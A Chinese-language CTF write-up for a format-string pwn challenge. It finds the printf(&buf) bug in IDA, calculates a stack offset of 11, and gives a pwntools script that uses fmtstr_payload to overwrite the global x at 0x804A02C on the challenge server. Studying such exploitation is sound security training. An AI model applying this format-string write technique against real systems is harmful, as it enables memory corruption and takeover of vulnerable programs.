首先IDA看一波:
看到这里就可以很清楚的知道这个肯定是一个格式化字符串的题,因为这个涉及到了更改栈中的元素的值,第一眼看到这个X,你可能有点慌,因为你没有发现有关X的任何定义,不过没关系,没有任何定义就出现在IDA中的变量,他一定就是一个全局变量,在pseudocode界面直接双击x,发现界面发生了跳转:
这个可以直接看到x的地址:0x804A02C,这个在之后的格式化字符串中有着很大的作用,
看完了IDA就可以很清楚的知道这个程序要我们干什么了:首先程序一开始定义了全局变量x的值是3,但是当你要使得x=4时,你才能控制程序,也就是拿到该题的flag,而且printf(&buf)很明显就是一个格式化字符串的漏洞;
知道了原理,接下来就是进行接下来的确定偏移还有脚本的编写:
第一步,确定偏移
在printf下断点,之后运行,随意输入一串字符,我输入的是“aaaaaaa”:
看到stack中的元素,指向我所输入字符串的地址是0xffffcecc,之前的地址是0xffffcea0,这两个地址的差便是我们要求的偏移,两者之差是44,但是我们的每个格式化字符串的大小都是4个字节,所以44/4=11,所以11便是我们要求的偏移,
偏移计算完成,接下来就是写脚本,这边注意有个福利,就是有现成的函数让你使用——fmtstr_payload( 偏移,{地址:更改地址的值 });
有了这个函数,直接给出脚本:
#!/usr/bin/env python
# encoding: utf-8
from pwn import *
#p = process("./fm")
p = remote("pwn2.jarvisoj.com", 9895)
x_add=0x0804A02C
#payload = p32(x_add) + "%11$n"
payload=fmtstr_payload(11,{x_add:4})
p.send(payload)
p.interactive()
直接运行就OK了,成功控制程序: